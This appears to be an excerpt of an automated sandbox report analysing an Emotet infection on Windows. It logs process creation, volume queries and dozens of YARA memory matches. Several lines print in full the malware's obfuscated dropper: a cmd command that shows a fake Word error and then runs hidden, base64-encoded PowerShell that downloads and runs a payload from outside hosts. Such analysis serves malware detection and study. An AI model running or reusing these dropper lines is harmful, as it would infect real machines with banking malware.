                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000016.00000002.2368006651.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2369643612.0000000000180000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2339483010.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2335393724.0000000000280000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2352976974.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2363852482.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2370162675.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2333967935.0000000000280000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2342378229.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2347071363.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2485894589.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2368454329.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2335519485.0000000000340000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2351415450.0000000000750000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2358322887.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2370274121.0000000000550000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2486292831.0000000002010000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2355550940.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2343974004.00000000004A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2368531156.0000000000450000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2360129710.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2338149952.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2343885574.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2359551824.0000000000460000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2364687136.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2355569966.0000000000750000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2352906309.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2351067576.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2333875086.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2355670534.0000000000930000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2342497051.0000000000280000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2367980145.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2338123179.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2335352749.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2339586653.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2330883211.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2339441337.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2485863461.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2347031079.0000000000280000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2348536550.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2360111276.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2358696763.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2360228021.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2352930564.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2351291099.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2348563781.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2343843229.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2348503069.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 20.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.750000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.430000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.930000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.6b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.550000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.280000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.2f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.930000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.4a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.2010000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.450000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.4a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.2010000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.460000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.280000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.750000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
